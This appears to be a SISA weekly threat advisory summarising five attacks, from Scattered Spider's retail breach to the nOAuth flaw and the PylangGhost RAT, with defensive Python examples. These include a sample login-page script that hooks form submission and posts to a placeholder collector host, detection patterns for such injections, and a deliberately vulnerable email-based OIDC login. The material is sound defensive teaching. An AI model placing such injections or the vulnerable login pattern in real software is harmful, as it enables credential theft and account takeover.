Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach


In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include:

  • Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach
  • Russian State-Backed Hackers Bypass Gmail MFA Using App-Specific Passwords in Sophisticated Phishing Campaign
  • Credential Theft Campaign Abuses Unpatched Microsoft Exchange Servers
  • Widespread nOAuth Vulnerability in Entra ID Exposes Thousands of SaaS Applications to Account Takeovers
  • PylangGhost RAT Analysis: North Korean APT Expands Multi-Platform Malware Arsenal


These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature – brings you a quick snapshot of the major security vulnerabilities that posed a threat to organizations worldwide. These recurring, actionable threat advisories also provide information and recommendations to help security teams take appropriate action against the latest critical threats.


1. Social Engineering at Scale: Scattered Spider Linked to Massive UK Retail Breach

In April 2025, Marks & Spencer and Co-op suffered coordinated cyberattacks that the UK’s Cyber Monitoring Centre has since classified as a single, systemic event. Attributed to the financially motivated group Scattered Spider, the attacks caused an estimated £270–£440 million in damage. The group relied on social engineering, posing as IT support to defeat help desk verification and gaining access through SIM swapping, phishing, and vishing. It later deployed ALPHV ransomware, used tools such as Cobalt Strike and AnyDesk for persistence, and exfiltrated data with Rclone and Plink, tools chosen because their traffic blends in with legitimate administration. To defend against such threats, organizations must tighten help desk identity-verification protocols, enforce hardware-based MFA, and train employees to recognize phishing and smishing. Deploying EDR/XDR, segmenting networks along Zero Trust principles, monitoring for abuse of legitimate administrative tools, and maintaining credential hygiene are critical. Third-party providers such as TCS must also be included in risk assessments so that they do not become an unintended attack surface. This case underscores the urgency of layered, proactive defense.

2. Hackers Bypass MFA Using App-Specific Passwords in Phishing Campaign

Between April and June 2025, Russian state-linked hackers tracked as UNC6293, likely tied to APT29, ran highly targeted phishing campaigns designed to bypass Gmail’s multi-factor authentication. Impersonating U.S. State Department officials with fake personas and spoofed CC addresses, they persuaded academics and foreign-policy critics to create and share app-specific passwords, which granted the attackers full Gmail access. This low-pressure, highly personalized approach relied on social engineering, convincing victims to enroll in a fake “MS DoS Guest Tenant” platform by following a PDF guide. The attackers then used residential proxies and VPS infrastructure to mask their activity. To defend against such threats, users, especially high-risk individuals, should enroll in Google’s Advanced Protection Program, which disables app-specific passwords and enforces security keys. Organizations using Google Workspace should block app-specific passwords through the admin console. It is also critical to educate users about slow-burn phishing tactics, monitor accounts for unusual logins, and enforce conditional access policies that restrict sign-ins by location or IP address.


3. Credential Theft Campaign Abuses Unpatched Microsoft Exchange Servers

Threat actors are actively targeting unpatched Microsoft Exchange servers by injecting JavaScript keyloggers into the Outlook Web App login page, capturing credentials and exfiltrating them through Telegram bots or DNS tunnels. The attacks exploit well-known vulnerabilities such as ProxyShell and ProxyLogon, with incidents reported in more than 26 countries. Because the JavaScript is embedded in the legitimate login interface, it runs unnoticed while harvesting credentials, cookies, user agents, and timestamps. In some variants the stolen data is written to a file on the compromised server for later collection; in others it is sent out immediately via outbound XHR requests or covert DNS tunnels. To counter this, organizations should patch all Exchange servers immediately, particularly those exposed to the internet. Regular audits of login pages and integrity checks of authentication files are essential, along with scanning for unauthorized code injections. Using network security tools to flag abnormal behavior, deploying a web application firewall, and limiting server exposure through VPNs or reverse proxies are critical defensive steps.
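The two audits recommended above, a known-good hash baseline for authentication files and a scan of the login page for script that hooks the form or makes network calls, can be scripted as follows. This is an added example, not SISA's tooling and not an Exchange component: the file names, the minimal login page and the injected snippet are constructed samples, and on a real server the files would be read from the Exchange installation directory with the baseline taken right after patching.

```python
"""Baseline and injection checks for web-mail login pages (added example)."""
import hashlib
import re
from typing import Dict, List

# Markers a stock login page has no reason to contain. They are a triage aid:
# a hash mismatch is the authoritative signal, and a legitimate page with its
# own inline script must be reviewed by a person rather than auto-flagged.
SUSPICIOUS = {
    "network-call-in-script": re.compile(
        r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(", re.I),
    "form-submit-hook": re.compile(
        r"\.onsubmit\s*=|addEventListener\s*\(\s*[\"']submit", re.I),
    "external-script-src": re.compile(
        r"<script[^>]+src\s*=\s*[\"']https?://", re.I),
}
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Dict[str, str]:
    """Hash every authentication file from a known-good copy."""
    return {name: sha256(content) for name, content in files.items()}


def check_integrity(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[str]:
    """Names of files that changed since the baseline, or that are new."""
    return sorted(n for n, c in current.items() if baseline.get(n) != sha256(c))


def scan_injections(page: bytes) -> List[str]:
    """Which SUSPICIOUS markers appear inside <script> elements of the page."""
    text = page.decode("utf-8", errors="replace")
    hits = set()
    for block in SCRIPT_BLOCK.findall(text):
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(block):
                hits.add(label)
    return sorted(hits)


# Constructed sample of a minimal login page (not the real OWA markup).
CLEAN_LOGON = b"""<html><body>
<form action="/owa/auth.owa" method="post" name="logonForm">
<input name="username"><input name="password" type="password">
</form></body></html>"""

# Constructed sample of the same page with a script appended after the form.
# The host name is a placeholder; the snippet only marks the shape of the
# injection that the checks above are meant to surface.
INJECTED_LOGON = CLEAN_LOGON.replace(b"</form>", b"""</form>
<script>
document.logonForm.onsubmit = function () {
  var req = new XMLHttpRequest();
  req.open("POST", "http://collector.invalid/");
};
</script>""")


def demo() -> dict:
    baseline = build_baseline({"logon.aspx": CLEAN_LOGON, "logon.js": b"// stock script"})
    current = {"logon.aspx": INJECTED_LOGON, "logon.js": b"// stock script"}
    return {
        "modified": check_integrity(baseline, current),  # ["logon.aspx"]
        "injected": scan_injections(INJECTED_LOGON),     # both marker labels
        "clean": scan_injections(CLEAN_LOGON),           # []
    }


if __name__ == "__main__":
    print(demo())
```

Run the baseline build once after each patch cycle and store the hashes off-box, so that an attacker who already has write access to the web root cannot rewrite the baseline along with the page; the pattern scan is only useful for prioritizing which mismatched file to look at first.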


4. Vulnerability in Entra ID Exposes Thousands of SaaS Applications to Account Takeovers

Over 15,000 SaaS applications remain vulnerable to a critical Microsoft Entra ID flaw known as nOAuth, which enables account takeover by abusing unverified email claims. Although disclosed in 2023, the issue persists because of insecure OpenID Connect (OIDC) implementations in which applications identify users by the email claim instead of the issuer (iss) and subject (sub) claims, which are the stable identifiers asserted by the identity provider. An attacker can register a rogue Entra tenant, spoof the victim’s email address on an account in that tenant, and sign in to the target application via “Sign in with Microsoft”, bypassing MFA, conditional access, and Zero Trust policies entirely. The flaw is hard to detect and trivial to exploit. To mitigate the risk, SaaS vendors must stop using email as a unique identifier and follow Microsoft’s nOAuth mitigation guidance. Code audits are needed to correct flawed OIDC logic, and applications must verify identity before granting access. Continuous log correlation and training for DevOps and identity teams will further strengthen protection against impersonation.
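The difference between the flawed and the correct account-linking logic is easiest to see side by side. The following is an added example, not SISA's code and not Microsoft's reference implementation: it places the nOAuth-prone pattern (finding the local account by the token's email claim) next to the fix (keying on the iss and sub pair), using constructed tenant URLs, subjects and addresses.

```python
"""Account linking in a 'Sign in with Microsoft' OIDC flow (added example)."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class User:
    user_id: str
    email: str  # display/contact attribute only, never an identity key


@dataclass
class UserStore:
    users: Dict[str, User] = field(default_factory=dict)
    # (issuer, subject) -> local user id; filled once per federated identity
    oidc_links: Dict[Tuple[str, str], str] = field(default_factory=dict)


def login_vulnerable(store: UserStore, claims: dict) -> Optional[str]:
    """The flawed pattern: trusts the `email` claim as the account key.

    Entra ID does not verify that the email attribute a tenant sets on its
    users belongs to a mailbox that tenant controls, so a token from any
    tenant whose user carries the victim's address matches the victim here.
    """
    email = (claims.get("email") or "").lower()
    for uid, user in store.users.items():
        if user.email.lower() == email:
            return uid
    return None


def login_hardened(store: UserStore, claims: dict) -> Optional[str]:
    """The fix: the (iss, sub) pair is unique per tenant and per user and is
    asserted by the identity provider rather than typed in by a tenant admin.
    Returns the local user id, or None if no link exists.
    """
    iss, sub = claims.get("iss"), claims.get("sub")
    if not iss or not sub:
        return None
    return store.oidc_links.get((iss, sub))


def link_account(store: UserStore, uid: str, claims: dict) -> None:
    """Binds a federated identity to a local account. A real application does
    this only after proving the caller owns the local account (an existing
    session or an ownership-verification step), never from the claim alone."""
    store.oidc_links[(claims["iss"], claims["sub"])] = uid


def demo() -> dict:
    store = UserStore()
    store.users["u-1"] = User("u-1", "victim@example.com")

    # Constructed: token from the victim's own tenant, linked at enrolment.
    legit = {"iss": "https://login.microsoftonline.com/tenant-a/v2.0",
             "sub": "subject-of-victim", "email": "victim@example.com"}
    link_account(store, "u-1", legit)

    # Constructed: token from a different tenant whose user was given the
    # victim's address as its email attribute. Same email, different iss/sub.
    spoofed = {"iss": "https://login.microsoftonline.com/tenant-b/v2.0",
               "sub": "subject-in-other-tenant", "email": "victim@example.com"}

    return {
        "vulnerable_accepts_spoof": login_vulnerable(store, spoofed),  # "u-1"
        "hardened_rejects_spoof": login_hardened(store, spoofed),      # None
        "hardened_accepts_legit": login_hardened(store, legit),        # "u-1"
    }


if __name__ == "__main__":
    print(demo())
```

Note that the hardened path deliberately has no fallback to email when the (iss, sub) lookup fails; an "auto-link by email on first sign-in" convenience feature reintroduces the same flaw, and new federated identities should be linked only through an explicit, ownership-verified enrolment step.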


5. PylangGhost RAT Analysis: North Korean APT Expands Multi-Platform Malware Arsenal

Cybersecurity researchers have uncovered PylangGhost, a new Python-based remote access trojan (RAT) deployed by the North Korea-aligned threat group Famous Chollima. Targeting Windows users in the cryptocurrency and blockchain sectors, the malware is delivered through fake job interviews that impersonate companies such as Coinbase and Uniswap. Victims are lured to spoofed sites, prompted to install fake video drivers, and unknowingly run PowerShell commands that deploy the malware. Once active, PylangGhost establishes persistence, extracts credentials from over 80 browser extensions, and communicates with its command-and-control server over plain HTTP, encrypting the payloads with RC4. This campaign targets Windows systems exclusively, while older variants of the tooling targeted macOS. To defend against this threat, organizations must block unapproved PowerShell execution, monitor for suspicious registry changes, and flag unexpected Python activity on endpoints. Network security tools should inspect HTTP traffic for encrypted payloads and block access to malicious domains. Equally important is educating users about fake recruitment lures and the dangers of running unknown scripts.
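The recommendation to inspect HTTP traffic for encrypted payloads can be implemented as an entropy check: RC4 output looks like uniformly random bytes, so a request body that carries a text content type over plain HTTP but has near-8-bit entropy deserves a look, and a base64-wrapped blob shows the same signature once decoded. The following is an added example, not part of the SISA advisory or of the research it summarises; the textbook RC4 routine is included only to generate sample ciphertext, the key is a throwaway, and the beacon content and content types are constructed.

```python
"""Entropy triage for plaintext-HTTP bodies (added example)."""
import base64
import binascii
import math
import re
from collections import Counter
from typing import Optional

# Content types that should carry human-readable data, not ciphertext.
TEXT_TYPES = ("text/", "application/x-www-form-urlencoded", "application/json")
B64_RE = re.compile(rb"^[A-Za-z0-9+/=\r\n]+$")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA), used here only to produce sample ciphertext."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _base64_payload(body: bytes) -> Optional[bytes]:
    """Decode the body if it consists only of base64 alphabet, else None."""
    if not B64_RE.match(body):
        return None
    try:
        return base64.b64decode(body, validate=False)
    except (binascii.Error, ValueError):
        return None


def looks_encrypted(content_type: str, body: bytes,
                    threshold: float = 7.0, min_len: int = 256) -> Optional[str]:
    """Reason string when the body warrants inspection, otherwise None.

    Binary content types legitimately carry high-entropy data and are skipped;
    short bodies are skipped because entropy of a few bytes is dominated by
    the sample size (a 64-byte body can never exceed 6 bits per byte).
    """
    if not content_type.lower().startswith(TEXT_TYPES):
        return None
    if len(body) < min_len:
        return None
    ent = shannon_entropy(body)
    if ent >= threshold:
        return f"raw body entropy {ent:.2f} bits/byte under a text content type"
    decoded = _base64_payload(body)
    if decoded and len(decoded) >= min_len:
        dec_ent = shannon_entropy(decoded)
        if dec_ent >= threshold:
            return f"base64-wrapped payload with entropy {dec_ent:.2f} bits/byte"
    return None


# Constructed samples: a benign JSON beacon and an RC4-encrypted copy of the
# same plaintext, raw and base64-wrapped, as an implant might post it.
PLAINTEXT = b'{"host":"WS-01","user":"alice","os":"Windows 11","ext":["wallet","auth"]}' * 16
BENIGN_BODY = PLAINTEXT
RC4_BODY = rc4(b"example-key", PLAINTEXT)
B64_BODY = base64.b64encode(RC4_BODY)


def demo() -> dict:
    return {
        "benign": looks_encrypted("application/json", BENIGN_BODY),            # None
        "rc4_raw": looks_encrypted("text/plain", RC4_BODY),                     # flagged
        "rc4_b64": looks_encrypted("application/x-www-form-urlencoded", B64_BODY),  # flagged
        "binary": looks_encrypted("application/octet-stream", RC4_BODY),        # None
    }


if __name__ == "__main__":
    print(demo())
```

Apply the check only after the transport layer has removed any Content-Encoding (gzip or brotli bodies are also high-entropy), and treat a hit as a reason to pivot to the source host's process and DNS activity rather than as a verdict on its own; compressed uploads with a mislabelled content type are the usual false positive.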


To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
